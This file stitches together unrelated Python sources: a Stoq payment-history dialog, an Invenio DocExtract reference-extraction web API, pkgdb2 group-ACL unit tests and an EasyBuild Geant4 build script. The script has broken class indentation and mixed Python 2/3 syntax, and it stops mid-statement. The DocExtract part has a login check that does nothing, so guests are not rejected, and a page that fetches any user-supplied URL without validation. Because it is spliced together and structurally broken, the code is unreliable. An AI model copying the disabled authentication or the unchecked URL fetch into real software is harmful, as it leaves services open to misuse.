            # We only store entries for dates higher than the user requested, but
            # we still need to create the entries from the beginning, so we
            # have the real balances
            if entry.history_date >= start:
                history.append(entry)

            previous_entry = entry

        return history
class PaymentFlowHistoryDialog(DateRangeDialog):
    """Date-range picker that prints the PaymentFlowHistoryReport."""

    title = _(u'Payment Flow History Dialog')
    desc = _("Select a date or a range to be visualised in the report:")
    size = (-1, -1)

    def __init__(self, store):
        """A dialog to print the PaymentFlowHistoryReport report.

        :param store: a store
        """
        self.store = store
        DateRangeDialog.__init__(self, title=self.title, header_text=self.desc)

    #
    # BasicDialog
    #

    def confirm(self):
        """Collect the selected range, build the history and print the report.

        Returns False (dialog stays open) when no history exists for the
        chosen interval."""
        DateRangeDialog.confirm(self)
        date_range = self.retval
        histories = PaymentFlowDay.get_flow_history(
            self.store, date_range.start, date_range.end)
        if not histories:
            info(_('No payment history found.'))
            return False

        print_report(PaymentFlowHistoryReport, payment_histories=histories)
        return True
|
# -*- coding: utf-8 -*-
"""DocExtract REST and Web API
Exposes document extration facilities to the world
"""
from tempfile import NamedTemporaryFile
from invenio.webinterface_handler import WebInterfaceDirectory
from invenio.webuser import collect_user_info
from invenio.webpage import page
from invenio.config import CFG_TMPSHAREDDIR, CFG_ETCDIR
from invenio.refextract_api import extract_references_from_file_xml, \
extract_references_from_url_xml, \
extract_references_from_string_xml
from invenio.bibformat_engine import format_record
def check_login(req):
    """Check that the user is logged in.

    Currently a no-op: guest users are detected but not rejected."""
    email = collect_user_info(req)['email']
    if email == 'guest':
        # Guests should have to login before uploading; enforcement is
        # intentionally disabled for now.
        pass
def check_url(url):
    """Check that the url we received is not gibberish.

    Returns True only for the download schemes refextract can fetch:
    http, https or ftp."""
    # str.startswith accepts a tuple of prefixes: one call instead of an
    # `or` chain.
    return url.startswith(('http://', 'https://', 'ftp://'))
def extract_from_pdf_string(pdf):
    """Extract references from a pdf stored in a string

    The string is written to a temporary file because refextract needs to
    run pdf2text on a real file."""
    # Save new record to file; closing the NamedTemporaryFile (on context
    # exit) also deletes it.
    tf = NamedTemporaryFile(prefix='docextract-pdf',
                            dir=CFG_TMPSHAREDDIR)
    with tf:
        tf.write(pdf)
        tf.flush()
        refs = extract_references_from_file_xml(tf.name)
    return refs
def make_arxiv_url(arxiv_id):
    """Make a url we can use to download a pdf from arxiv

    Arguments:
    arxiv_id -- the arxiv id of the record to link to
    """
    url = "http://arxiv.org/pdf/%s.pdf" % arxiv_id
    return url
class WebInterfaceAPIDocExtract(WebInterfaceDirectory):
    """DocExtract REST API"""

    # URL path -> handler method mapping consumed by WebInterfaceDirectory.
    _exports = [
        ('extract-references-pdf', 'extract_references_pdf'),
        ('extract-references-pdf-url', 'extract_references_pdf_url'),
        ('extract-references-txt', 'extract_references_txt'),
    ]

    def extract_references_pdf(self, req, form):
        """Extract references from uploaded pdf

        Returns the reference XML, or a plain error string for a bad request."""
        check_login(req)
        if 'pdf' not in form:
            return 'No PDF file uploaded'
        return extract_from_pdf_string(form['pdf'].stream.read())

    def extract_references_pdf_url(self, req, form):
        """Extract references from the pdf pointed by the passed url"""
        check_login(req)
        if 'url' not in form:
            return 'No URL specified'
        url = form['url']
        # Reject anything that is not an http(s)/ftp url.
        if not check_url(url):
            return 'Invalid URL specified'
        return extract_references_from_url_xml(url)

    def extract_references_txt(self, req, form):
        """Extract references from plain text"""
        check_login(req)
        if 'txt' not in form:
            return 'No text specified'
        txt = form['txt'].stream.read()
        return extract_references_from_string_xml(txt)
class WebInterfaceDocExtract(WebInterfaceDirectory):
    """DocExtract API"""

    _exports = ['api',
                ('extract-references', 'extract_references'),
                ('example.pdf', 'example_pdf'),
                ]

    # Sub-directory handling the REST endpoints under /api.
    api = WebInterfaceAPIDocExtract()

    def example_pdf(self, req, _form):
        """Serve a test pdf for tests"""
        f = open("%s/docextract/example.pdf" % CFG_ETCDIR, 'rb')
        try:
            req.write(f.read())
        finally:
            f.close()

    def extract_references_template(self):
        """Template for reference extraction page"""
        return """Please specify a pdf or a url or some references to parse
<form action="extract-references" method="post"
enctype="multipart/form-data">
<p>PDF: <input type="file" name="pdf" /></p>
<p>arXiv: <input type="text" name="arxiv" /></p>
<p>URL: <input type="text" name="url" style="width: 600px;"/></p>
<textarea name="txt" style="width: 500px; height: 500px;"></textarea>
<p><input type="submit" /></p>
</form>
"""

    def extract_references(self, req, form):
        """Refrences extraction page

        This page can be used for authors to test their pdfs against our
        refrences extraction process"""
        user_info = collect_user_info(req)

        # Handle the 3 POST parameters
        if 'pdf' in form and form['pdf']:
            pdf = form['pdf']
            # NOTE(review): the REST endpoint above reads
            # form['pdf'].stream.read() before calling
            # extract_from_pdf_string; here the raw form field is passed
            # instead -- confirm the field object is accepted as a string.
            references_xml = extract_from_pdf_string(pdf)
        elif 'arxiv' in form and form['arxiv']:
            url = make_arxiv_url(arxiv_id=form['arxiv'])
            references_xml = extract_references_from_url_xml(url)
        elif 'url' in form and form['url']:
            url = form['url']
            references_xml = extract_references_from_url_xml(url)
        elif 'txt' in form and form['txt']:
            txt = form['txt']
            references_xml = extract_references_from_string_xml(txt)
        else:
            references_xml = None

        # If we have not uploaded anything yet
        # Display the form that allows us to do so
        if not references_xml:
            out = self.extract_references_template()
        else:
            # Hide the "report numbers" input link when showing results.
            out = """
            <style type="text/css">
                #referenceinp_link { display: none; }
            </style>
            """
            out += format_record(0,
                                 'hdref',
                                 xml_record=references_xml.encode('utf-8'),
                                 user_info=user_info)

        # Render the page (including header, footer)
        return page(title='References Extractor',
                    body=out,
                    uid=user_info['uid'],
                    req=req)
|
'''
pkgdb tests for the Collection object.
'''
__requires__ = ['SQLAlchemy >= 0.7']
import pkg_resources
import json
import unittest
import sys
import os
from mock import patch
sys.path.insert(0, os.path.join(os.path.dirname(
os.path.abspath(__file__)), '..'))
import pkgdb2
import pkgdb2.lib.model as model
from tests import (Modeltests, FakeFasUser,
FakeFasGroupValid, create_package_acl,
create_package_acl2, user_set)
class PkgdbGrouptests(Modeltests):
    """ PkgdbGroup tests. """

    def setUp(self):
        """ Set up the environnment, ran before every tests. """
        super(PkgdbGrouptests, self).setUp()

        pkgdb2.APP.config['TESTING'] = True
        # Point every pkgdb2 sub-module at this test's database session.
        pkgdb2.SESSION = self.session
        pkgdb2.api.extras.SESSION = self.session
        pkgdb2.ui.SESSION = self.session
        pkgdb2.ui.acls.SESSION = self.session
        pkgdb2.ui.admin.SESSION = self.session
        pkgdb2.ui.collections.SESSION = self.session
        pkgdb2.ui.packagers.SESSION = self.session
        pkgdb2.ui.packages.SESSION = self.session
        self.app = pkgdb2.APP.test_client()

        # Let's make sure the cache is empty for the tests
        pkgdb2.CACHE.invalidate()

    def set_group_acls(self):
        ''' Create some Group ACLs. '''
        fedocal_pkg = model.Package.by_name(self.session, 'rpms', 'fedocal')
        devel_collec = model.Collection.by_name(self.session, 'master')
        f18_collec = model.Collection.by_name(self.session, 'f18')

        pklist_fedocal_f18 = model.PackageListing.by_pkgid_collectionid(
            self.session, fedocal_pkg.id, f18_collec.id)
        pklist_fedocal_devel = model.PackageListing.by_pkgid_collectionid(
            self.session, fedocal_pkg.id, devel_collec.id)

        # Grant the infra-sig group 'commit' and 'watchbugzilla' on fedocal
        # for both the f18 and devel (master) branches.
        packager = model.PackageListingAcl(
            fas_name='group::infra-sig',
            packagelisting_id=pklist_fedocal_f18.id,
            acl='commit',
            status='Approved',
        )
        self.session.add(packager)

        packager = model.PackageListingAcl(
            fas_name='group::infra-sig',
            packagelisting_id=pklist_fedocal_devel.id,
            acl='commit',
            status='Approved',
        )
        self.session.add(packager)

        packager = model.PackageListingAcl(
            fas_name='group::infra-sig',
            packagelisting_id=pklist_fedocal_f18.id,
            acl='watchbugzilla',
            status='Approved',
        )
        self.session.add(packager)

        packager = model.PackageListingAcl(
            fas_name='group::infra-sig',
            packagelisting_id=pklist_fedocal_devel.id,
            acl='watchbugzilla',
            status='Approved',
        )
        self.session.add(packager)
        self.session.commit()

    def test_api_bugzilla_group(self):
        """ Test the api_bugzilla function. """

        create_package_acl2(self.session)
        self.set_group_acls()

        # Plain-text export of the bugzilla ACLs.
        output = self.app.get('/api/bugzilla/')
        self.assertEqual(output.status_code, 200)
        expected = """# Package Database VCS Acls
Fedora|fedocal|A web-based calendar for Fedora|pingou||group::infra-sig,pingou
Fedora|geany|A fast and lightweight IDE using GTK2|group::gtk-sig||
Fedora|guake|Top down terminal for GNOME|pingou||spot"""

        self.assertEqual(output.data, expected)

        # JSON export of the same data; note groups are '@'-prefixed here.
        output = self.app.get('/api/bugzilla/?format=json')
        self.assertEqual(output.status_code, 200)
        expected = {
            u'bugzillaAcls': {
                'Fedora': {
                    "fedocal": {
                        "owner": "pingou",
                        "cclist": {
                            "groups": ["@infra-sig"],
                            "people": ["pingou"]
                        },
                        "qacontact": None,
                        "summary": "A web-based calendar for Fedora"
                    },
                    'geany': {
                        'owner': '@gtk-sig',
                        'cclist': {
                            'groups': [],
                            'people': []
                        },
                        'qacontact': None,
                        'summary': 'A fast and lightweight IDE using '
                        'GTK2'
                    },
                    'guake': {
                        'owner': 'pingou',
                        'cclist': {
                            'groups': [],
                            'people': ['spot']
                        },
                        'qacontact': None,
                        'summary': 'Top down terminal for GNOME'
                    }
                }
            },
            'title': 'Fedora Package Database -- Bugzilla ACLs'
        }

        data = json.loads(output.data)
        self.assertEqual(data, expected)

    @patch('pkgdb2.lib.utils')
    @patch('pkgdb2.packager_login_required')
    def test_package_give_group(self, login_func, mock_func):
        """ Test the package_give function to a group. """
        login_func.return_value = None

        create_package_acl(self.session)

        # Stub out FAS lookups and logging so no external service is hit.
        mock_func.get_packagers.return_value = ['spot']
        group = FakeFasGroupValid()
        group.name = 'gtk-sig'
        mock_func.get_fas_group.return_value = group
        mock_func.log.return_value = ''

        user = FakeFasUser()

        # First give the package from the default user to 'spot'.
        with user_set(pkgdb2.APP, user):
            output = self.app.get('/package/rpms/guake/give')
            self.assertEqual(output.status_code, 200)
            self.assertTrue(
                '<h1>Give Point of Contact of package: guake</h1>'
                in output.data)
            self.assertTrue(
                '<input id="csrf_token" name="csrf_token"' in output.data)

            csrf_token = output.data.split(
                'name="csrf_token" type="hidden" value="')[1].split('">')[0]

            data = {
                'branches': 'master',
                'poc': 'spot',
                'csrf_token': csrf_token,
            }

            output = self.app.post('/package/rpms/guake/give', data=data,
                                   follow_redirects=True)
            self.assertEqual(output.status_code, 200)
            self.assertTrue(
                'rpms/<span property="doap:name">guake</span>'
                in output.data)
            self.assertEqual(
                output.data.count('<a href="/packager/spot/">'), 2)

        # Then, acting as 'spot' (now a gtk-sig member), give it to the group.
        user.username = 'spot'
        user.groups.append('gtk-sig')
        with user_set(pkgdb2.APP, user):
            output = self.app.get('/package/rpms/guake/give')
            self.assertEqual(output.status_code, 200)
            self.assertTrue(
                '<h1>Give Point of Contact of package: guake</h1>'
                in output.data)
            self.assertTrue(
                '<input id="csrf_token" name="csrf_token"' in output.data)

            csrf_token = output.data.split(
                'name="csrf_token" type="hidden" value="')[1].split('">')[0]

            data = {
                'branches': 'master',
                'poc': 'group::gtk-sig',
                'csrf_token': csrf_token,
            }

            output = self.app.post('/package/rpms/guake/give', data=data,
                                   follow_redirects=True)
            self.assertEqual(output.status_code, 200)
            self.assertEqual(
                output.data.count('<a href="/packager/spot/">'), 2)
            self.assertEqual(
                output.data.count('<a href="/packager/group::gtk-sig/">'),
                1)

            # No branch is left to give away, so the branch selector is empty.
            output = self.app.get('/package/rpms/guake/give')
            self.assertEqual(output.status_code, 200)
            self.assertTrue(
                '<h1>Give Point of Contact of package: guake</h1>'
                in output.data)
            self.assertTrue(
                '<td><select id="branches" multiple name="branches">'
                '</select></td>'
                in output.data)
if __name__ == '__main__':
    # Run only this module's tests, with verbose per-test output.
    runner = unittest.TextTestRunner(verbosity=2)
    runner.run(unittest.TestLoader().loadTestsFromTestCase(PkgdbGrouptests))
|
"""
Geant4 support, implemented as an easyblock.
@author: Stijn De Weirdt (Ghent University)
@author: Dries Verdegem (Ghent University)
@author: Kenneth Hoste (Ghent University)
@author: Pieter De Baets (Ghent University)
@author: Jens Timmerman (Ghent University)
"""
import os
import shutil
import re
from distutils.version import LooseVersion
import easybuild.tools.environment as env
from easybuild.framework.easyconfig import CUSTOM
from easybuild.easyblocks.generic.cmakemake import CMakeMake
from easybuild.tools.filetools import run_cmd, run_cmd_qa
from easybuild.tools.modules import get_software_root
from easybuild.tools.filetools import mkdir
class EB_Geant4(CMakeMake):
"""
Support for building Geant4.
Note: Geant4 moved to a CMAKE like build system as of version 9.5.
"""
@staticmethod
def extra_options():
"""
Define extra options needed by Geant4
"""
extra_vars = {
'G4ABLAVersion': [None, "G4ABLA version", CUSTOM],
'G4NDLVersion': [None, "G4NDL version", CUSTOM],
'G4EMLOWVersion': [None, "G4EMLOW version", CUSTOM],
'PhotonEvaporationVersion': [None, "PhotonEvaporation version", CUSTOM],
'G4RadioactiveDecayVersion': [None, "G4RadioactiveDecay version", CUSTOM],
}
return CMakeMake.extra_options(extra_vars)
    def configure_step(self):
        """
        Configure Geant4 build, either via CMake for versions more recent than 9.5,
        or using an interactive configuration procedure otherwise.
        """
        # Geant4 switched to a cmake build system in 9.5
        if LooseVersion(self.version) >= LooseVersion("9.5"):
            # Out-of-source build directory for cmake.
            mkdir('configdir')
            os.chdir('configdir')
            super(EB_Geant4, self).configure_step(srcdir="..")
        else:
            # Interactive ./Configure flow: every known prompt is matched
            # against a canned answer. qanda/noqanda are stored on self
            # because build_step replays them when it re-runs Configure.
            pwd = self.cfg['start_dir']
            dst = self.installdir
            clhepdir = get_software_root('CLHEP')
            cmd = "%s/Configure -E -build" % pwd

            self.qanda = {# questions and answers for version 9.1.p03
                "There exists a config.sh file. Shall I use it to set the defaults? [y]": "n",
                "Would you like to see the instructions? [n]": "",
                "[Type carriage return to continue]": "",
                "Definition of G4SYSTEM variable is Linux-g++. That stands for: 1) OS : Linux" \
                "2) Compiler : g++ To modify default settings, select number above (e.g. 2) " \
                "[Press [Enter] for default settings]": "2",
                "Which C++ compiler? [g++]": "$(GPP)",
                "Confirm your selection or set recommended 'g++'! [*]": "",
                "Definition of G4SYSTEM variable is Linux-icc. That stands for: 1) OS : Linux 2)" \
                "Compiler : icc To modify default settings, select number above (e.g. 2) " \
                "[Press [Enter] for default settings]": "",
                "Do you expect to run these scripts and binaries on multiple machines? [n]": "y",
                "Where is Geant4 source installed? [%s]" % pwd: "",
                "Specify the path where Geant4 libraries and source files should be installed." \
                " [%s]" % pwd: dst,
                "Do you want to copy all Geant4 headers in one directory? [n]": "y",
                "Please, specify default directory where ALL the Geant4 data is installed:" \
                "G4LEVELGAMMADATA: %(pwd)s/data/PhotonEvaporation2.0 G4RADIOACTIVEDATA: " \
                "%(pwd)s/data/RadioactiveDecay3.2 G4LEDATA: %(pwd)s/data/G4EMLOW5.1 G4NEUTRONHPDATA: " \
                "%(pwd)s/data/G4NDL3.12 G4ABLADATA: %(pwd)s/data/G4ABLA3.0 You will be asked about " \
                "customizing these next. [%(pwd)s/data]" % {'pwd': pwd}: "%s/data" % dst,
                "Directory %s/data doesn't exist. Use that name anyway? [n]" % dst: "y",
                "Please, specify default directory where the Geant4 data is installed: " \
                "1) G4LEVELGAMMADATA: %(dst)s/data/PhotonEvaporation2.0 2) G4RADIOACTIVEDATA: " \
                "%(dst)s/data/RadioactiveDecay3.2 3) G4LEDATA: %(dst)s/data/G4EMLOW5.1 4) G4NEUTRONHPDATA: " \
                "%(dst)s/data/G4NDL3.12 5) G4ABLADATA: %(dst)s/data/G4ABLA3.0 To modify default settings, " \
                "select number above (e.g. 2) [Press [Enter] for default settings]" % {'dst': dst}: "",
                "Please, specify where CLHEP is installed: CLHEP_BASE_DIR: ": clhepdir,
                "Please, specify where CLHEP is installed: CLHEP_BASE_DIR: [%s]" % clhepdir: "",
                "You can customize paths and library name of you CLHEP installation: 1) CLHEP_INCLUDE_DIR: " \
                "%(clhepdir)s/include 2) CLHEP_LIB_DIR: %(clhepdir)s/lib 3) CLHEP_LIB: CLHEP To modify " \
                "default settings, select number above (e.g. 2) [Press [Enter] for default settings]" %
                {'clhepdir': clhepdir}: "",
                "By default 'static' (.a) libraries are built. Do you want to build 'shared' (.so) " \
                "libraries? [n]": "y",
                "You selected to build 'shared' (.so) libraries. Do you want to build 'static' (.a) " \
                "libraries too? [n]": "y",
                "Do you want to build 'global' compound libraries? [n]": "",
                "Do you want to compile libraries in DEBUG mode (-g)? [n]": "",
                "G4UI_NONE If this variable is set, no UI sessions nor any UI libraries are built. " \
                "This can be useful when running a pure batch job or in a user framework having its own " \
                "UI system. Do you want to set this variable ? [n]": "",
                "G4UI_BUILD_XAW_SESSION G4UI_USE_XAW Specifies to include and use the XAW interfaces in " \
                "the application to be built. The XAW (X11 Athena Widget set) extensions are required to " \
                "activate and build this driver. [n]": "",
                "G4UI_BUILD_XM_SESSION G4UI_USE_XM Specifies to include and use the XM Motif based user " \
                "interfaces. The XM Motif extensions are required to activate and build this driver. [n]": "",
                "G4VIS_NONE If this variable is set, no visualization drivers will be built or used. Do " \
                "you want to set this variable ? [n]": "n",
                "G4VIS_BUILD_OPENGLX_DRIVER G4VIS_USE_OPENGLX It is an interface to the de facto standard " \
                "3D graphics library, OpenGL. It is well suited for real-time fast visualization and " \
                "prototyping. The X11 version of the OpenGL libraries is required. [n]": "",
                "G4VIS_BUILD_OPENGLXM_DRIVER G4VIS_USE_OPENGLXM It is an interface to the de facto " \
                "standard 3D graphics library, OpenGL. It is well suited for real-time fast visualization " \
                "and prototyping. The X11 version of the OpenGL libraries and the Motif Xm extension is " \
                "required. [n]": "",
                "G4VIS_BUILD_DAWN_DRIVER G4VIS_USE_DAWN DAWN drivers are interfaces to the Fukui Renderer " \
                "DAWN. DAWN is a vectorized 3D PostScript processor suited to prepare technical high " \
                "quality outputs for presentation and/or documentation. [n]": "",
                "G4VIS_BUILD_OIX_DRIVER G4VIS_USE_OIX The OpenInventor driver is based on OpenInventor tech" \
                "nology for scientific visualization. The X11 version of OpenInventor is required. [n]": "",
                "G4VIS_BUILD_RAYTRACERX_DRIVER G4VIS_USE_RAYTRACERX Allows for interactive ray-tracing " \
                "graphics through X11. The X11 package is required. [n]": "",
                "G4VIS_BUILD_VRML_DRIVER G4VIS_USE_VRML These driver generate VRML files, which describe " \
                "3D scenes to be visualized with a proper VRML viewer. [n]": "",
                "G4LIB_BUILD_GDML Setting this variable will enable building of the GDML plugin module " \
                "embedded in Geant4 for detector description persistency. It requires your system to have " \
                "the XercesC library and headers installed. Do you want to set this variable? [n]": "",
                "G4LIB_BUILD_G3TOG4 The utility module 'g3tog4' will be built by setting this variable. " \
                "NOTE: it requires a valid FORTRAN compiler to be installed on your system and the " \
                "'cernlib' command in the path, in order to build the ancillary tools! Do you want to " \
                "build 'g3tog4' ? [n]": "",
                "G4LIB_BUILD_ZLIB Do you want to activate compression for output files generated by the " \
                "HepRep visualization driver? [n]": "y",
                "G4ANALYSIS_USE Activates the configuration setup for allowing plugins to analysis tools " \
                "based on AIDA (Astract Interfaces for Data Analysis). In order to use AIDA features and " \
                "compliant analysis tools, the proper environment for these tools will have to be set " \
                "(see documentation for the specific analysis tools). [n]": "",
                "Press [Enter] to start installation or use a shell escape to edit config.sh: ": "",
                # extra questions and answers for version 9.2.p03
                "Directory %s doesn't exist. Use that name anyway? [n]" % dst: "y",
                "Specify the path where the Geant4 data libraries PhotonEvaporation%s " \
                "RadioactiveDecay%s G4EMLOW%s G4NDL%s G4ABLA%s are " \
                "installed. For now, a flat directory structure is assumed, and this can be customized " \
                "at the next step if needed. [%s/data]" % (self.cfg['PhotonEvaporationVersion'],
                                                           self.cfg['G4RadioactiveDecayVersion'],
                                                           self.cfg['G4EMLOWVersion'],
                                                           self.cfg['G4NDLVersion'],
                                                           self.cfg['G4ABLAVersion'],
                                                           pwd
                                                           ): "%s/data" % dst,
                "Please enter 1) Another path to search in 2) 'f' to force the use of the path " \
                "you entered previously (the data libraries are not needed to build Geant4, but " \
                "are needed to run applications later). 3) 'c' to customize the data paths, e.g. " \
                "if you have the data libraries installed in different locations. [f]": "",
                "G4UI_BUILD_QT_SESSION G4UI_USE_QT Setting these variables will enable the building " \
                "of the G4 Qt based user interface module and the use of this module in your " \
                "applications respectively. The Qt3 or Qt4 headers, libraries and moc application are " \
                "required to enable the building of this module. Do you want to enable build and use of " \
                "this module? [n]": "",
                # extra questions and answers for version 9.4.po1
                "What is the path to the Geant4 source tree? [%s]" % pwd: "",
                "Where should Geant4 be installed? [%s]" % pwd: dst,
                "Do you want to install all Geant4 headers in one directory? [n]": "y",
                "Do you want to build shared libraries? [y]": "",
                "Do you want to build static libraries too? [n]": "",
                "Do you want to build global libraries? [y]": "",
                "Do you want to build granular libraries as well? [n]": "",
                "Do you want to build libraries with debugging information? [n]": "",
                "Specify the path where the Geant4 data libraries are installed: [%s/data]" % pwd: "%s/data" % dst,
                "How many parallel jobs should make launch? [1]": "%s" % self.cfg['parallel'],
                "Please enter 1) Another path to search in 2) 'f' to force the use of the path you entered " \
                "previously (the data libraries are NOT needed to build Geant4, but are needed to run " \
                "applications later). 3) 'c' to customize the data paths, e.g. if you have the data " \
                "libraries installed in different locations. [f]": "",
                "Enable building of User Interface (UI) modules? [y]": "",
                "Enable building of the XAW (X11 Athena Widget set) UI module? [n]": "",
                "Enable building of the X11-Motif (Xm) UI module? [n]": "",
                "Enable building of the Qt UI module? [n]": "",
                "Enable building of visualization drivers? [y]": "n",
                "Enable the Geometry Description Markup Language (GDML) module? [n]": "",
                "Enable build of the g3tog4 utility module? [n]": "",
                "Enable internal zlib compression for HepRep visualization? [n] ": "",
            }

            # Output patterns that are progress noise, not questions.
            self.noqanda = [r"Compiling\s+.*?\s+\.\.\.",
                            r"Making\s+dependency\s+for\s+file\s+.*?\s+\.\.\.",
                            r"Making\s+libname\.map\s+starter\s+file\s+\.\.\.",
                            r"Making\s+libname\.map\s+\.\.\.",
                            r"Reading\s+library\s+get_name\s+map\s+file\s*\.\.\.",
                            r"Reading\s+dependency\s+files\s*\.\.\.",
                            r"Creating\s+shared\s+library\s+.*?\s+\.\.\."
                            ]

            run_cmd_qa(cmd, self.qanda, self.noqanda, log_all=True, simple=True)

            # determining self.g4system
            # NOTE(review): self.log.error presumably raises in (legacy)
            # EasyBuild, aborting the step on failure -- confirm.
            try:
                scriptdirbase = os.path.join(pwd, '.config', 'bin')
                filelist = os.listdir(scriptdirbase)
            except OSError, err:
                self.log.error("Failed to determine self.g4system: %s" % err)

            if len(filelist) != 1:
                self.log.error("Exactly one directory is expected in %s; found back: %s" % (scriptdirbase, filelist))
            else:
                self.g4system = filelist[0]

            self.scriptdir = os.path.join(scriptdirbase, self.g4system)
            if not os.path.isdir(self.scriptdir):
                self.log.error("Something went wrong. Dir: %s doesn't exist." % self.scriptdir)
            self.log.info("The directory containing several important scripts to be copied was found: %s" % self.scriptdir)

            # copying config.sh to pwd
            try:
                self.log.info("copying config.sh to %s" % pwd)
                shutil.copy2(os.path.join(self.scriptdir, 'config.sh'), pwd)
            except IOError, err:
                self.log.error("Failed to copy config.sh to %s" % pwd)

            # creating several scripts containing environment variables
            cmd = "%s/Configure -S -f config.sh -D g4conf=%s -D abssrc=%s" % (pwd, self.scriptdir, pwd)
            run_cmd(cmd, log_all=True, simple=True)
def build_step(self):
    """Build Geant4: delegate to the parent easyblock for v9.5 and newer,
    otherwise drive the legacy interactive Configure build."""
    if LooseVersion(self.version) < LooseVersion("9.5"):
        # legacy build, answering prompts with the Q&A pairs prepared during configure
        builddir = self.cfg['start_dir']
        run_cmd_qa("%s/Configure -build" % builddir, self.qanda, no_qa=self.noqanda, log_all=True, simple=True)
    else:
        super(EB_Geant4, self).build_step()
def install_step(self):
    """
    Install Geant4.

    For Geant4 >= 9.5 the parent easyblock's install step is reused, and only
    the dataset location is recorded. For older versions a legacy
    Configure-driven install is performed, which also copies the datasets and
    support scripts into the installation directory and builds the MPI
    interface shipped with the examples.
    """
    if LooseVersion(self.version) >= LooseVersion("9.5"):
        super(EB_Geant4, self).install_step()

        # datasets end up under share/<name>-<version-without-"p0">/data
        self.datadst = os.path.join(self.installdir,
                                    'share',
                                    '%s-%s' % (self.name, self.version.replace("p0", "")),
                                    'data',
                                   )
    else:
        pwd = self.cfg['start_dir']

        # create target directory for the datasets, which are unpacked
        # next to the source directory
        try:
            datasrc = os.path.join(pwd, '..')
            self.datadst = os.path.join(self.installdir, 'data')
            os.mkdir(self.datadst)
        except OSError as err:
            self.log.error("Failed to create data destination directory %s: %s" % (self.datadst, err))

        datalist = ['G4ABLA%s' % self.cfg['G4ABLAVersion'],
                    'G4EMLOW%s' % self.cfg['G4EMLOWVersion'],
                    'G4NDL%s' % self.cfg['G4NDLVersion'],
                    'PhotonEvaporation%s' % self.cfg['PhotonEvaporationVersion'],
                    'RadioactiveDecay%s' % self.cfg['G4RadioactiveDecayVersion'],
                   ]
        # shutil.copytree raises shutil.Error (not IOError), so catch both
        try:
            for dat in datalist:
                self.log.info("Copying %s to %s" % (dat, self.datadst))
                shutil.copytree(os.path.join(datasrc, dat), os.path.join(self.datadst, dat))
        except (IOError, shutil.Error) as err:
            self.log.error("Something went wrong during data copying (%s) to %s: %s" % (dat, self.datadst, err))

        # copy support files/directories from the build dir into the install dir
        try:
            for fil in ['config', 'environments', 'examples']:
                self.log.info("Copying %s to %s" % (fil, self.installdir))
                path = os.path.join(pwd, fil)
                if not os.path.exists(path):
                    self.log.error("No such file or directory: %s" % fil)
                if os.path.isdir(path):
                    shutil.copytree(path, os.path.join(self.installdir, fil))
                elif os.path.isfile(path):
                    shutil.copy2(path, os.path.join(self.installdir, fil))
        except (IOError, shutil.Error) as err:
            self.log.error("Something went wrong during copying of %s to %s: %s" % (fil, self.installdir, err))

        # also copy the generated environment/config scripts
        try:
            for fil in ['config.sh', 'env.sh', 'env.csh']:
                self.log.info("Copying %s to %s" % (fil, self.installdir))
                path = os.path.join(self.scriptdir, fil)
                if not os.path.exists(path):
                    self.log.error("No such file or directory: %s" % fil)
                if os.path.isdir(path):
                    shutil.copytree(path, os.path.join(self.installdir, fil))
                elif os.path.isfile(path):
                    shutil.copy2(path, os.path.join(self.installdir, fil))
        except (IOError, shutil.Error) as err:
            self.log.error("Something went wrong during copying of (%s) to %s: %s" % (fil, self.installdir, err))

        cmd = "%(pwd)s/Configure -f %(pwd)s/config.sh -d -install" % {'pwd': pwd}
        run_cmd(cmd, log_all=True, simple=True)

        # build the MPI interface shipped with the examples
        mpiuidir = os.path.join(self.installdir, "examples/extended/parallel/MPI/mpi_interface")
        os.chdir(mpiuidir)

        # tweak config file as needed
        with open("G4MPI.gmk", "r") as gmk:
            G4MPItxt = gmk.read()

        root_re = re.compile(r"(.*G4MPIROOT\s+=\s+).*", re.MULTILINE)
        cxx_re = re.compile(r"(.*CXX\s+:=\s+).*", re.MULTILINE)
        cppflags_re = re.compile(r"(.*CPPFLAGS\s+\+=\s+.*)", re.MULTILINE)

        G4MPItxt = root_re.sub(r"\1%s/intel64" % get_software_root('IMPI'), G4MPItxt)
        G4MPItxt = cxx_re.sub(r"\1mpicxx -cxx=icpc", G4MPItxt)
        # NOTE: fixed a stray ')' that used to produce a malformed '-I<clhep>)/include' flag
        G4MPItxt = cppflags_re.sub(r"\1 -I$(G4INCLUDE) -I%s/include" % get_software_root('CLHEP'), G4MPItxt)
        self.log.debug("contents of G4MPI.gmk: %s" % G4MPItxt)

        # keep a backup of the original file before overwriting it
        shutil.copyfile("G4MPI.gmk", "G4MPI.gmk.ORIG")
        with open("G4MPI.gmk", "w") as gmk:
            gmk.write(G4MPItxt)

        # make sure the required environment variables are there for make
        env.setvar("G4INSTALL", self.installdir)
        env.setvar("G4SYSTEM", self.g4system)
        env.setvar("G4LIB", "%s/lib/geant4/" % self.installdir)
        env.setvar("G4INCLUDE", "%s/include/geant4/" % self.installdir)

        run_cmd("make", log_all=True, simple=True)
        run_cmd("make includes", log_all=True, simple=True)
def make_module_extra(self):
    """Define Geant4-specific environment variables in the generated module file."""
    # major.minor part of the version
    g4version = '.'.join(self.version.split('.')[:2])

    setenv = self.moduleGenerator.set_environment
    parts = [super(EB_Geant4, self).make_module_extra()]
    parts.append(setenv('G4INSTALL', "$root"))
    # no longer needed in > 9.5, but leave it there for now
    parts.append(setenv('G4VERSION', g4version))

    if LooseVersion(self.version) >= LooseVersion("9.5"):
        parts.append(setenv('G4INCLUDE', "$root/include/Geant4"))
        parts.append(setenv('G4LIB', "$root/lib64/Geant4"))
    else:
        parts.append(setenv('G4INCLUDE', "$root/include/geant4"))
        parts.append(setenv('G4LIB', "$root/lib/geant4"))
        parts.append(setenv('G4SYSTEM', self.g4system))
        # dataset locations, as populated during install_step
        parts.append(setenv('G4ABLADATA', "%s/G4ABLA%s" % (self.datadst, self.cfg['G4ABLAVersion'])))
        parts.append(setenv('G4LEVELGAMMADATA', "%s/PhotonEvaporation%s" % (self.datadst, self.cfg['PhotonEvaporationVersion'])))
        parts.append(setenv('G4RADIOACTIVEDATA', "%s/RadioactiveDecay%s" % (self.datadst, self.cfg['G4RadioactiveDecayVersion'])))
        parts.append(setenv('G4LEDATA', "%s/G4EMLOW%s" % (self.datadst, self.cfg['G4EMLOWVersion'])))
        parts.append(setenv('G4NEUTRONHPDATA', "%s/G4NDL%s" % (self.datadst, self.cfg['G4NDLVersion'])))

    return ''.join(parts)
def sanity_check_step(self):
    """
    Custom sanity check for Geant4 >= 9.5.
    Not tested with previous versions.
    """
    wrappers = ["bin/geant4%s" % suff for suff in ('.sh', '.csh', '-config')]
    libs = ["lib64/libG4%s.so" % lib for lib in ('analysis', 'event', 'GMocren', 'materials',
